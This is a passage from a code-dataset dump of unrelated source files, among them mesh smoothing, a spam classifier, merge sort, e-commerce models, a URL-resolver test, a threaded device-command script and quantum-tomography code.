(http://pages.stat.wisc.edu/~mchung/softwares/hk/\n hk_smooth.m). The kernel bandwidth corresponds to diffusion time in the heat equation [3]. The\n FWHM follows 4*sqrt(log 2*n_smooth*sigma) with the natural log.\n \n If you use this code, please reference one of the following papers. The details on the \n mathematical basis of the algorithm can be found in these papers.\n \n [1] Chung, M.K., Robbins, S., Dalton, K.M., Davidson, R.J., Alexander, A.L., Evans, A.C. 2005. \n Cortical thickness analysis in autism via heat kernel smoothing. NeuroImage 25:1256-1265 \n http://www.stat.wisc.edu/~mchung/papers/ni_heatkernel.pdf\n\n [2] Chung, M.K., Robbins, S., Evans, A.C. 2005. Unified statistical approach to cortical \n thickness analysis. Information Processing in Medical Imaging (IPMI). Lecture Notes in Computer \n Science (LNCS) 3565:627-638. Springer-Verlag \n http://www.stat.wisc.edu/~mchung/papers/IPMI/hk.IPMI.2005.pdf\n\n [3] Chung, M.K., Hartley, R., Dalton, K.M., Davidson, R.J. 2008. Encoding cortical surface by \n spherical harmonics. Statistica Sinica 18:1269-1291 \n http://www.stat.wisc.edu/%7Emchung/papers/sinica.2008.pdf\n \n Inputs:\n *vtx: vertex points or surface mesh.\n *fac: faces of surface mesh.\n *data: array of vertex-wise sampled data points.\n *adjm: adjacency matrix.\n *sigma: kernel bandwidth.\n *n_smooth: number of iterations.\n Outputs:\n *res: array of vertex-wise smoothed data points.\n \n created by Daniel Haenelt\n Date created: 04-03-2020\n Last modified: 04-03-2020\n \"\"\"\n import numpy as np\n from lib_gbb.neighbor.nn_2d import nn_2d\n\n # number of vertices\n n_vertex = len(vtx)\n\n # heat kernel shape\n K = lambda x, sigma : np.exp(-x/(4*sigma))/np.sum(np.exp(-x/(4*sigma)))\n \n # get max degree (number of first order neighbors)\n max_degree = 0\n for i in range(n_vertex):\n nn = nn_2d(i, adjm, 0)\n degree = len(nn)\n if degree > max_degree:\n max_degree = degree\n \n # heat kernel weight computation\n neighbor = np.zeros((n_vertex, max_degree+1)).astype(int) # including the current vertex\n weight = np.zeros((n_vertex, max_degree+1)) # including the current vertex\n for i in range(n_vertex):\n \n # get vertex neighbors\n nn = nn_2d(i, adjm, 0)\n degree = len(nn)\n\n # get distance to vertex neighbors\n distance = 0 # dummy first entry: the vertex itself (distance 0)\n for j in range(degree):\n distance = np.append(distance, np.sum(( vtx[nn[j]] - vtx[i,:] ) ** 2))\n \n # get heat kernel weighting for each neighbor\n weight[i,:1+degree] = K(distance, sigma)\n \n # get corresponding neighbor (add 1 because of dummy row)\n neighbor[i,:1+degree] = np.append([i],nn) + 1 \n\n # add dummy row\n data = np.append(1, data)\n \n # iterative kernel smoothing\n for i in range(n_smooth):\n \n # add weights (max_degree+1 columns: all neighbors plus the current vertex)\n res = np.zeros_like(data)\n for j in range(max_degree+1):\n res[1:] += data[neighbor[:,j]] * weight[:,j]\n \n # initialize new data array\n data = res.copy()\n \n # remove dummy row \n res = res[1:]\n \n return res","sub_path":"lib/surface/heat_kernel_smoothing.py","file_name":"heat_kernel_smoothing.py","file_ext":"py","file_size_in_byte":3471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"402511221","text":"'''Given a word w, rearrange the letters of w to construct another word s in such a way that s is lexicographically greater \nthan w. 
In case of multiple possible answers, find the lexicographically smallest one among them.'''\n\n\nfor x in range(int(input().strip())):\n s = input().strip()\n x = len(s) - 1\n while(x > 0 and s[x] <= s[x - 1]):\n x -= 1\n \n if(x == 0):\n print(\"no answer\")\n continue\n \n j = len(s) - 1\n while(j > x - 1 and s[j] <= s[x - 1]):\n j -= 1\n \n s = list(s)\n s[x - 1], s[j] = s[j], s[x - 1]\n print(''.join(s[:x]) + ''.join(list(reversed(s[x:]))))\n","sub_path":"Bigger is Greater.py","file_name":"Bigger is Greater.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"27274325","text":"# Copyright (c) 2016-2022 Association of Universities for Research in Astronomy, Inc. (AURA)\n# For license information see LICENSE or https://opensource.org/licenses/BSD-3-Clause\n\nfrom datetime import date\n\nfrom lucupy.minimodel import Site\n\nfrom scheduler.services.resource import OcsResourceService\n\n# For Bryan and Kristin: testing instructions\nif __name__ == '__main__':\n # To get the Resources for a specific site on a specific local date, modify the following.\n site = Site.GN\n day = date(year=2018, month=11, day=8)\n\n resources_available = OcsResourceService().get_resources(site, day)\n\n print(f'*** Resources for site {site.name} for {day} ***')\n for resource in sorted(resources_available, key=lambda x: x.id):\n print(resource)\n","sub_path":"scheduler/scripts/get_resources.py","file_name":"get_resources.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"119438733","text":"import math\nimport random\nimport pickle\nimport numpy as np\nimport sys\nfrom scipy import spatial\n\n\n# lang = sys.argv[1]\n# w = float(sys.argv[2])\nlang = 'fr_en'\nw = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9] #\n\nclass EAstrategy:\n seeds = []\n linkEmbedding=[]\n kg1E=[]\n kg2E=[]\n EA_results={}\n\n def read_EA_list(self,EAfile):\n # with open(EAfile,'r',encoding='utf-8') as r:\n # lines=r.readlines()\n # for line in lines:\n # line=line.strip()\n # e1, e2=line.split()\n # if e1 in self.seeds_map:\n # print('error,',e1)\n # else:\n # self.seeds_map[e1]=e2\n\n ret = []\n with open(EAfile, encoding='utf-8') as f:\n for line in f:\n th = line[:-1].split('\\t')\n x = []\n for i in range(2):\n x.append(int(th[i]))\n ret.append(tuple(x))\n self.seeds = ret[int(len(ret)*0.3):]\n\n def read_KG1_and_KG2_list(self,kg1file,kg2file):\n with open(kg1file,'r',encoding='utf-8') as r:\n kg1lines=r.readlines()\n with open(kg2file,'r',encoding='utf-8') as r:\n kg2lines=r.readlines()\n for line in kg1lines:\n line=line.strip()\n self.kg1E.append(line.split()[0])\n for line in kg2lines:\n line = line.strip()\n self.kg2E.append(line.split()[0])\n\n def XRR(self, RTEembeddingfile):\n RTElines = pickle.load(open(RTEembeddingfile, 'rb'), encoding='utf-8')\n entlength = len(RTElines)\n for i in range(entlength):\n rline = RTElines[i]\n rline_list = rline.tolist()\n self.linkEmbedding.append(rline_list)\n\n def XRA(self, ATEembeddingfile):\n with open(ATEembeddingfile, 'r', encoding='utf-8') as r:\n ATElines = r.readlines()\n entlength = len(ATElines)\n for i in range(entlength):\n aline = ATElines[i].strip()\n aline_list = aline.split()\n self.linkEmbedding.append(aline_list)\n\n def EAlinkstrategy(self,RTEembeddingfile,ATEembeddingfile):\n RTElines=pickle.load(open(RTEembeddingfile,'rb'),encoding='utf-8')\n with 
open(ATEembeddingfile,'r',encoding='utf-8') as r:\n ATElines=r.readlines()\n entlength=len(ATElines)\n for i in range(entlength): #list concatenation operation\n rline=RTElines[i]\n rline_list=rline.tolist()\n aline=ATElines[i].strip()\n aline_list=aline.split()\n self.linkEmbedding.append(rline_list+aline_list)\n\n def EAlinkstrategy_weight(self,RTEembeddingfile,ATEembeddingfile, w):\n RTElines=pickle.load(open(RTEembeddingfile,'rb'),encoding='utf-8')\n with open(ATEembeddingfile,'r',encoding='utf-8') as r:\n ATElines=r.readlines()\n entlength=len(ATElines)\n for i in range(entlength): #weight assignment operation\n rline=RTElines[i]\n rline_list=rline.tolist()\n rline_list_w = [float(j) * float(w) for j in rline_list]\n aline=ATElines[i].strip()\n aline_list=aline.split()\n aline_list_w = [float(j) * float(1-w) for j in aline_list]\n add_weight = list(map(lambda x:x[0]+x[1], zip(rline_list_w, aline_list_w)))\n self.linkEmbedding.append(add_weight)\n print('complete weighting')\n\n def EAlinkstrategy_iteration(self, RTEembeddingfile):\n RTElines = pickle.load(open(RTEembeddingfile, 'rb'), encoding='utf-8')\n self.linkEmbedding = RTElines\n # def distance(self,yuzhi):\n # count = 0\n # for i in self.kg1E:\n # count += 1\n # align_id_list={} #id: distance\n # for j in self.kg2E:\n # dimension=len(self.linkEmbedding[int(j)])\n # now_dis=0\n # for k in range(dimension):\n # now_dis+=abs(float(self.linkEmbedding[int(i)][k])-float(self.linkEmbedding[int(j)][k])) #L1 regularization computation\n # if now_dis p_ham:\n return 'spam'\n else:\n return 'ham'\n\n\nif __name__ == '__main__':\n global test_ham_count\n global test_spam_count\n print('Start read data')\n before_read = time.time()\n\n raw_data = pd.read_csv('email_data.csv', header=0)\n\n end_read = time.time()\n print('Finished read data')\n print('Reading email costs %ss' % (end_read - before_read))\n data = raw_data.values\n emails = data[:2000, 1::]\n label = data[:2000, 0]\n\n print('Start parse')\n data_set = parse_email_content(emails)\n print('Finished parse')\n\n print('Start statistical words ')\n before_start = time.time()\n spam_dict, ham_dict, total_spam, total_ham, p_spam_email = statistical_words(data_set, label)\n after_start = time.time()\n print('train cost:%ss' % (after_start - before_start))\n\n # words = raw_input('Please input words:\\n')\n\n print('Calculate correct rate...')\n test_emails = data[2000:2500, 1::]\n test_label = data[2000:2500, 0]\n index = 0\n\n I, J, K, L = (0, 0, 0, 0)\n before_start = time.time()\n for test_email in test_emails:\n words = str(test_email[0]).split(',')\n result = classify_by_words(words, spam_dict, ham_dict, total_spam, total_ham, p_spam_email)\n correct_label = test_label[index]\n if correct_label == 'ham':\n test_ham_count += 1\n if result == correct_label:\n I += 1\n else:\n J += 1\n else:\n test_spam_count += 1\n if result == correct_label:\n L += 1\n else:\n K += 1\n index += 1\n\n print('I: %s, J: %s, K: %s, L: %s' % (I, J, K, L))\n\n print('correct rate: %s' % ((float(L + I) / (I + J + K + L))))\n print('ham email correct rate: %s' % (float(I) / (K + I)))\n print('spam email correct rate: %s' % (float(L) / (L + J)))\n print('ham email return rate: %s' % (float(I) / (I + J)))\n print('spam email return rate: %s' % (float(L) / (L + K)))\n\n after_start = time.time()\n print('Test Cost:%ss' % (after_start - before_start))\n\n print('train_spam_count: %s, train_ham_count: %s, test_spam_count: %s, test_ham_count: %s' % (\n train_spam_count, train_ham_count, test_spam_count, 
test_ham_count))\n","sub_path":"new_email_classify.py","file_name":"new_email_classify.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"178700646","text":"\ndef mergeSort(array):\n print(\"Dividing \",array)\n if len(array)>1:\n mitad = len(array)//2\n izq = array[:mitad]\n der = array[mitad:]\n mergeSort(izq)\n mergeSort(der)\n i=0\n j=0\n k=0\n while i < len(izq) and j < len(der):\n if izq[i] < der[j]:\n array[k]=izq[i]\n i=i+1\n else:\n array[k]=der[j]\n j=j+1\n k=k+1\n while i < len(izq):\n array[k]=izq[i]\n i=i+1\n k=k+1\n while j < len(der):\n array[k]=der[j]\n j=j+1\n k=k+1\n print(\"Merging \",array)\narray = [54,26,93,17,77,31,44,55,20]\nmergeSort(array)\nprint(array)\n","sub_path":"Clase-4/mergsort.py","file_name":"mergsort.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"609268042","text":"class Sku:\n def __init__(self, sku, price, storage, shipping_fee, style_color, style_size, image_url,\n extra_image_list, weight=300):\n self.sku = sku\n self.price = price\n self.storage = storage\n self.shipping_fee = shipping_fee\n self.style_color = style_color\n self.style_size = style_size\n self.image_url = image_url\n self.weight = weight\n self.extra_image_list = extra_image_list\n\n\nclass ProductImage:\n def __init__(self, resource_id, url, goods_sku_list, main_image, sku_image):\n self.resource_id = resource_id\n self.url = url\n self.goods_sku_list = goods_sku_list\n self.main_image = main_image\n self.sku_image = sku_image\n\n\nclass Product:\n def __init__(self, product_id, cat_id, main_image, goods_name, goods_description, parent_sku, sku_list, image_list):\n self.id = product_id\n self.cat_id = cat_id\n self.main_image = main_image\n self.name = goods_name\n self.description = goods_description\n self.parent_sku = parent_sku\n self.sku_list = sku_list\n self.image_list = image_list\n\n\nclass UploadStatus:\n def __init__(self, status, message, product_list):\n self.status = status\n self.message = message\n self.product_list = product_list\n\n\nclass UploadProductDto:\n def __init__(self, cat_id, parent_sku, goods_sku, goods_name, storage, style_color, style_size,\n goods_description, shop_price, shipping_fee, shipping_weight, main_image,\n extra_image, extra_image_list):\n self.cat_id = cat_id\n self.parent_sku = parent_sku\n self.goods_sku = goods_sku\n self.goods_name = goods_name\n self.storage = storage\n self.style_color = style_color\n self.style_size = style_size\n self.goods_description = goods_description\n self.shop_price = shop_price\n self.shipping_fee = shipping_fee\n self.main_image = main_image\n self.shipping_weight = shipping_weight\n self.extra_image = extra_image\n self.extra_image_list = extra_image_list\n\n @staticmethod\n def from_product(product):\n dto_list = []\n for sku in product.sku_list:\n dto = UploadProductDto(cat_id=product.cat_id,\n parent_sku=product.parent_sku,\n goods_sku=sku.sku,\n goods_name=product.name,\n goods_description=product.description,\n storage=sku.storage,\n style_color=sku.style_color,\n style_size=sku.style_size,\n shop_price=sku.price,\n shipping_fee=sku.shipping_fee,\n shipping_weight=sku.weight,\n main_image=product.main_image,\n extra_image=sku.image_url,\n extra_image_list=product.image_list)\n dto_list.append(dto)\n return 
dto_list\n","sub_path":"ecommerce-facade/model/product_model.py","file_name":"product_model.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"265267853","text":"from minet.utils import resolve, create_pool\n\nURLS = [\n\n # Direct hit\n 'https://www.lemonde.fr/',\n\n # Regular redirect\n 'http://bit.ly/2KkpxiW',\n\n # Self loop\n 'https://demo.cyotek.com/features/redirectlooptest.php',\n 'https://bit.ly/2gnvlgb',\n\n # Meta refresh & UA nonsense\n 'http://bit.ly/2YupNmj',\n\n # Invalid URL\n 'http://www.outremersbeyou.com/talent-de-la-semaine-la-designer-comorienne-aisha-wadaane-je-suis-fiere-de-mes-origines/',\n\n # Refresh header\n 'http://la-grange.net/2015/03/26/refresh/',\n\n # GET & UA nonsense\n 'https://ebay.us/BUkuxU',\n\n # Incorrect refresh header\n 'http://ow.ly/csT350v7mRc',\n\n # Utf-8 location header\n 'http://ow.ly/2awz50v1JkO',\n 'http://xfru.it/v2uFaC',\n\n # IP Host redirect\n 'https://bit.ly/2ANzJNW'\n]\n\nhttp = create_pool()\n\nfor url in URLS:\n print()\n error, stack = resolve(http, url, follow_meta_refresh=True)\n print(error)\n for item in stack:\n print(item)\n","sub_path":"ftest/resolve.py","file_name":"resolve.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"607560830","text":"from collections import defaultdict\n\nN = int(input())\nMOD = 10**9 + 7\n\nprimeCount = defaultdict(int)\n\ndef primeList(n):\n p = 2\n factors = defaultdict(int) # renamed from 'primeList' to avoid shadowing the function\n while n > 1:\n if n % p == 0:\n while n % p == 0:\n factors[p] += 1\n n //= p\n p += 1\n if n >= 2:\n factors[n] = 1\n return factors\n\nfor i in range(1, N + 1):\n for prime, count in primeList(i).items():\n primeCount[prime] += count\n\nans = 1\nfor _, count in primeCount.items():\n ans *= (count + 1)\n ans %= MOD\n\nprint(ans)","sub_path":"AtCoder/abc/052c.py","file_name":"052c.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"582679832","text":"#!/usr/bin/python3\n# Version 1.0\n# Author hiziv\n\ntry:\n import Queue\nexcept ImportError:\n import queue as Queue\nimport threading\nimport time\nfrom psendcommand import *\n\nexitFlag = 0\n\nclass myThread (threading.Thread):\n def __init__(self, threadID, name, q):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n self.q = q\n def run(self):\n print (\"Starting \" + self.name)\n process_data(self.name, self.q)\n print (\"Exiting \" + self.name)\n\ndef process_data(threadName, q):\n while not exitFlag:\n queueLock.acquire()\n if not workQueue.empty():\n data = q.get()\n queueLock.release()\n #print (\"%s processing %s\" % (threadName, data))\n print (data)\n send (data)\n print (adict)\n else:\n queueLock.release()\n time.sleep(1)\n\nthreadList = [\"Thread-1\", \"Thread-2\", \"Thread-3\"]\n#nameList = [\"One\", \"Two\", \"Three\", \"Four\", \"Five\"]\nqueueLock = threading.Lock()\nworkQueue = Queue.Queue(2000)\nthreads = []\nthreadID = 1\nnameList=[]\n\nlist_devices=open('list.txt').readlines() #Reads the device list; the file must be in the same directory as the script -- something to change later\n\n#pdb.set_trace()\nfor i in list_devices:\n x=i.split ()\n if len(x) == 7 :\n sMethod = (x[0])\n sHostname = (x[1])\n sIp = (x[2])\n sUsername = (x[3])\n sPassword = (x[4])\n sEnable = (x[5])\n sUID = (x[6])\n nameList.append(sMethod + 
\",\" + sHostname + \",\" + sIp + \",\" + sUsername + \",\" + sPassword + \",\" + sEnable + \",\" + sUID) \n #print (adict)\n else:\n print ('not enough arguments for device ' + x[1])\n\n\n\n# Create new threads\nfor tName in threadList:\n thread = myThread(threadID, tName, workQueue)\n thread.start()\n threads.append(thread)\n threadID += 1\n\n# Fill the queue\nqueueLock.acquire()\nfor word in nameList:\n workQueue.put(word)\nqueueLock.release()\n\n# Wait for queue to empty\nwhile not workQueue.empty():\n pass\n\n# Notify threads it's time to exit\nexitFlag = 1\n\n# Wait for all threads to complete\nfor t in threads:\n t.join()\nprint (\"Exiting Main Thread\")\n","sub_path":"app/utils/psendcommand/thread.py","file_name":"thread.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"203699207","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef getTsFromCholesky(T):\n\t'''Function that creates list of t-parameters from cholesky T matrix.'''\n\tt = []\n\tfor r in range(T.shape[0]):\n\t\tfor c in range(T.shape[1]):\n\t\t\tif r == c:\n\t\t\t\tt.append(T[r][c].real)\n\t\t\telif r>c:\n\t\t\t\tif T[r][c] == 0:\n\t\t\t\t\tt.append(0)\n\t\t\t\t\tt.append(0)\n\t\t\t\telif isinstance(T[r][c], complex):\n\t\t\t\t\tt.append(T[r][c].real)\n\t\t\t\t\tt.append(T[r][c].imag)\n\t\t\t\telse:\n\t\t\t\t\tt.append(T[r][c].real)\n\t\t\t\t\tt.append(0)\n\t\t\t\t'''if c == 0:\n\t\t\t\t\ttemp_dict[i] = [T[r][c].real]\n\t\t\t\telse:\n\t\t\t\t\tif isinstance(T[r][c], complex):\n\t\t\t\t\t\ttemp_dict[i] = [T[r][c].real, T[r][c].imag]\n\t\t\t\t\telse: \n\t\t\t\t\t\ttemp_dict[i] = [T[r][c]]\n\t\t\t\ti+=1\n\n\tfor key, val in sorted(temp_dict.items()):\n\t\tt = t + val'''\n\tprint(len(t))\n\treturn t\n\ndef getRhofromt_NQB(n,nlvl,t):\n\t\"\"\"Function that takes guess of Cholesky decomposition of density matrix,\n\tand returns a 8x8 density matrix\n\n\tThe Cholesky decomposition for three-qubit density matrix is:\n\trho = (T.dag() * T)/(Tr(T.dag() * T))\n\twhere T is upper triangular matrix of the form\n\tT = [[ t_0 , 0 , 0 , 0 ],\n\t\t [ t_4+it_5 , t_1 , 0 , 0],\n\t\t [ t_10+it_11, t_6+it_7 , t_2 , 0],\n\t\t [ t_14+it_15, t_12+it_13 , t_8+it_9 , t_3] ...\n\t\t ...]\n\tParameters\n\t----------\n\tt : array\n\t\tlength = 64, containing (real) values of t's\n\n\tReturns\n\t-------\n\trho_t: array\n\t\t4x4 density matrix\n\n\t\"\"\"\n\t'''\n\tFunction that takes a t (len=64) and generates the 8x8 density matrix from\n\tCholesky decomp:rho = (T.dag() * T)/(Tr(T.dag() * T))\n\n\t'''\n\t'''T = np.matrix([[t[0], 0, 0, 0],\n\t\t\t\t [t[1] + 1j*t[2], t[3], 0, 0],\n\t\t\t\t [t[4] + 1j*t[5], t[6] + 1j*t[7], t[8], 0],\n\t\t\t\t [t[9] + 1j*t[10], t[11] + 1j*t[12], t[13] + 1j*t[14], t[15]] ...])\n\t'''\n\tT = []\n\tk=0\n\tfor r in range(nlvl**n):\n\t\trow = []\n\t\tfor c in range(nlvl**n):\n\t\t\tif c > r:\n\t\t\t\trow.append(0)\n\t\t\telif c == r:\n\t\t\t\trow.append(t[k])\n\t\t\t\tk+=1\n\t\t\telse:\n\t\t\t\trow.append(t[k]+1j*t[k+1])\n\t\t\t\tk+=2\n\t\tT.append(row)\n\n\tT=np.array(T)\n\tplt.matshow(T.real, cmap='hot', interpolation='nearest')\n\tplt.title(\"GENERATED CHOLESKY\")\n\tplt.show()\n\n\tprint(T.real)\n\tprint(\"*****************************************\")\n\n\n\tnorm = np.dot(T, T.transpose().conj()).trace()\n\tprint(norm)\n\tplt.matshow(T.conjugate().transpose().real, cmap='hot', interpolation='nearest')\n\tplt.title(\"CONJUGATE CHOLESKY\")\n\tplt.show()\n\trho_t = np.dot(T, T.transpose().conj())/norm\n\treturn 
np.array(rho_t)\n\ndef idealFockRho(phase = 0):\n rho = np.zeros((4,4),dtype=complex)\n rho[1,1] = .5\n rho[2,2] = .5\n rho[2,1] = .5*np.exp(1j*phase)\n rho[1,2] = .5*np.exp(-1j*phase)\n return rho\n\ndef idealNOONRho(phase = 0):\n\trho = np.zeros((9,9),dtype=complex)\n\t#print( 1e-1*np.eye(9))\n\trho[2,2] = .5\n\trho[6,6] = .5\n\trho[2,6] = .5*np.exp(1j*phase)\n\trho[6,2] = .5*np.exp(-1j*phase)\n\treturn rho\n\n#print(idealNOONRho().shape)\n#print(np.eye(9).shape)\n\ndensity_matrix = np.eye(9)\n#density_matrix = idealNOONRho()\n#density_matrix = idealFockRho()\nplt.matshow(density_matrix.real, cmap='hot', interpolation='nearest')\nplt.title(\"ORIG MATRIX\")\nplt.show()\n\ntry:\n\tt_guess = getTsFromCholesky(np.linalg.cholesky(density_matrix))\n\tplt.matshow(np.linalg.cholesky(density_matrix).real, cmap='hot', interpolation='nearest')\n\tplt.title(\"TRUE CHOLESKY\")\n\tplt.show()\n\tprint(np.linalg.cholesky(density_matrix))\nexcept Exception as e:\n\tprint(e)\n\tt_guess = getTsFromCholesky(np.linalg.cholesky(density_matrix+ 1e-14*np.eye(np.shape(density_matrix)[0])))\n\tplt.matshow(np.linalg.cholesky(density_matrix+ 1e-14*np.eye(np.shape(density_matrix)[0])).real, cmap='hot', interpolation='nearest')\n\tplt.title(\"TRUE CHOLESKY\")\n\tplt.show()\n\tprint(np.linalg.cholesky(density_matrix+ 1e-14*np.eye(np.shape(density_matrix)[0])).real)\n\tprint(\"***************************************\")\n\n\nrho = np.array(getRhofromt_NQB(2,3,t_guess).real)\nprint(\"___________________________\")\nprint(density_matrix)\nprint(\"___________________________\")\nprint(rho)\n\n\nplt.matshow(rho, cmap='hot', interpolation='nearest')\nplt.title(\"GENERATED MATRIX\")\nplt.show()\n\nprint(rho)","sub_path":"MultiQubit_PulseGenerator/NQB/nqb_tomo_cholesky_fix.py","file_name":"nqb_tomo_cholesky_fix.py","file_ext":"py","file_size_in_byte":4113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"103204668","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.constants import k\nfrom math import factorial\n\nk = 1 # override Boltzmann constant: work in units of k\n\nN = int(300)\nN_len = 800\nq = np.linspace(1,N_len,N_len)\ndq = (q[-1]-q[0])/(len(q)-1)\n\n\nomega = np.zeros(N_len)\nfor i in range(0,N_len):\n omega[i] = factorial(int(q[i])+N-1)/(factorial(int(q[i]))*factorial(N-1))\nS = k*np.log(omega)\n\ndqdS = np.zeros(N_len)\n\nfor i in range(1,N_len):\n dqdS[i] = dq/(S[i]-S[i-1])\nT = dqdS\n\nCv = np.zeros(N_len)\nfor i in range(1,N_len):\n Cv[i] = dq/(T[i]-T[i-1])\n\n\nplt.plot(q,Cv/N,label=r\"$N=%g$\"%(N_len))\nplt.xlabel(\"q\",fontsize=15)\nplt.ylabel(r\"$C_V/Nk$\",fontsize=15)\nplt.legend()\nplt.savefig(\"../figures/C_mot_q.png\")\nplt.clf()\n\nplt.plot(q,S,label=r\"$N=%g$\"%(N_len))\nplt.xlabel(\"q\",fontsize=15)\nplt.ylabel(r\"$S/k$\",fontsize=15)\nplt.legend()\nplt.savefig(\"../figures/S_mot_q.png\")\nplt.clf()\n\noutfile = open(\"../data_files/numerical_data.txt\",\"w+\")\noutfile.write(\"q Omega S T Cv/Nk N=%g\\n\"%(N_len))\nfor i in range(N_len):\n outfile.write(\"%g %.5f %.5f %.5f %.5f\\n\"%(q[i],omega[i],S[i],T[i],Cv[i]/N))\noutfile.close()\n","sub_path":"Oblig_1/python_files/numerical_solver.py","file_name":"numerical_solver.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"134777508","text":"from functools import reduce\n\ndef f(x, y):\n print(x)\n print(y)\n return x\n\n\n\nr = reduce(f, [1, 3, 5, 7, 9])\nprint(r)\n\nopts = [\n ('a','A'),\n # ('weekday', udfs.weekday('ts')),\n 
#('is_weekend', udfs.is_weekend('ts')),\n ]\n\nvalue1= [1, 3, 5, 7, 9]\nvalue2 = [0,1,2,3,4,5,6,7,8,9,10]\nraw = reduce(f, opts, value1)\nprint(raw)","sub_path":"TestGrammar/reduceTest.py","file_name":"reduceTest.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"91714886","text":"import unittest\nimport os\n\n# Add parent dir to path to import utils\nimport sys\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__),\n '..')))\nfrom test_cases import utils\n\n\nclass CRMLead(unittest.TestCase):\n\n @utils.allow(services=['salesforce', 'dynamics', 'oracle'])\n def setUp(self):\n data = {\n 'company': 'API Test Company Name',\n 'last_name': 'API Test Lead Last Name'\n }\n self.obj = self.account.crm_leads.create(data=data)\n\n @utils.allow(services=['salesforce', 'dynamics', 'oracle'])\n def tearDown(self):\n self.obj.delete()\n\n @utils.allow(services=['salesforce', 'dynamics', 'oracle'])\n def test_list_object(self):\n objects = self.account.crm_leads.all()\n # assert properties\n if objects:\n obj = objects[0]\n self.assertEqual(obj.type, 'Lead')\n self.assertTrue('raw' in obj)\n\n @utils.allow(services=['salesforce', 'dynamics', 'oracle'])\n def test_read_object(self):\n obj = self.account.crm_leads.retrieve(self.obj.id)\n # assert Lead properties\n self.assertEqual(obj.id, self.obj.id)\n self.assertEqual(obj.type, 'Lead')\n self.assertTrue('raw' in obj)\n\n self.assertTrue('created' in obj)\n self.assertTrue('modified' in obj)\n self.assertTrue('description' in obj)\n\n @utils.allow(services=['salesforce', 'dynamics', 'oracle'])\n def test_update_object(self):\n obj = self.obj\n obj.description = 'test lead description'\n obj.save()\n self.assertEqual('test lead description', obj.description)\n\n\ndef test_cases():\n return [utils.create_test_case(acc, CRMLead) for acc in utils.accounts]\n\nif __name__ == '__main__':\n suite = utils.create_suite(test_cases())\n unittest.TextTestRunner(verbosity=2).run(suite)\n","sub_path":"tests/integration/crm_api/test_lead.py","file_name":"test_lead.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"262243685","text":"import numpy as np\nfrom numba import jit\n\n\n@jit(nopython=True)\ndef to_yawpitchroll_jit(R, in_degrees=True, eps=1e-16):\n R = R.reshape((-1, 3, 3))\n ypr = np.empty((R.shape[0], 3), dtype=np.float64)\n for i in range(R.shape[0]):\n if np.any(np.isnan(R[i, :, :])):\n ypr[i, :] = np.nan\n else:\n if np.abs(R[i, 2, 1] - 1) <= eps or np.abs(R[i, 2, 1] + 1) <= eps:\n ypr[i, 0] = 0.0\n ypr[i, 1] = np.arcsin(R[i, 2, 1])\n ypr[i, 2] = np.arctan2(R[i, 1, 0], R[i, 0, 0])\n else:\n p = np.arcsin(R[i, 2, 1])\n ypr[i, 1] = p\n ypr[i, 2] = -np.arctan2(R[i, 2, 0] / np.cos(p), R[i, 2, 2] / np.cos(p))\n ypr[i, 0] = -np.arctan2(R[i, 0, 1] / np.cos(p), R[i, 1, 1] / np.cos(p))\n\n return ypr if not in_degrees else np.rad2deg(ypr)\n\n\ndef to_yawpitchroll(R, in_degrees=True, eps=1e-16):\n # for some reason squeezing the result array in the numba function doesn't work\n return to_yawpitchroll_jit(R, in_degrees=in_degrees, eps=eps).squeeze()\n\n\n","sub_path":"freehead/to_yawpitchroll.py","file_name":"to_yawpitchroll.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"184859159","text":"import random\n\nimport numpy as np\n\n\n\nclass Link:\n 
\"\"\"A link between two units. Simple, non active class.\"\"\"\n\n def __init__(self, pre_unit, post_unit, w0, fw0):\n self.pre = pre_unit\n self.post = post_unit\n self.wt = w0\n self.fwt = fw0\n self.dwt = 0.0\n\n\nclass Connection:\n \"\"\"Connection between layers\"\"\"\n\n def __init__(self, pre_layer, post_layer, spec=None):\n \"\"\"\n Parameters:\n pre_layer the layer sending its activity.\n post_layer the layer receiving the activity.\n \"\"\"\n self.pre = pre_layer\n self.post = post_layer\n self.links = []\n self.spec = spec\n if self.spec is None:\n self.spec = ConnectionSpec()\n\n self.spec.projection_init(self)\n\n post_layer.connections.append(self)\n\n @property\n def weights(self):\n \"\"\"Return a matrix of the links weights\"\"\"\n if self.spec.proj.lower() == '1to1':\n return np.array([[link.wt for link in self.links]])\n else: # proj == 'full'\n W = np.zeros((len(self.pre.units), len(self.post.units))) # weight matrix\n link_it = iter(self.links) # link 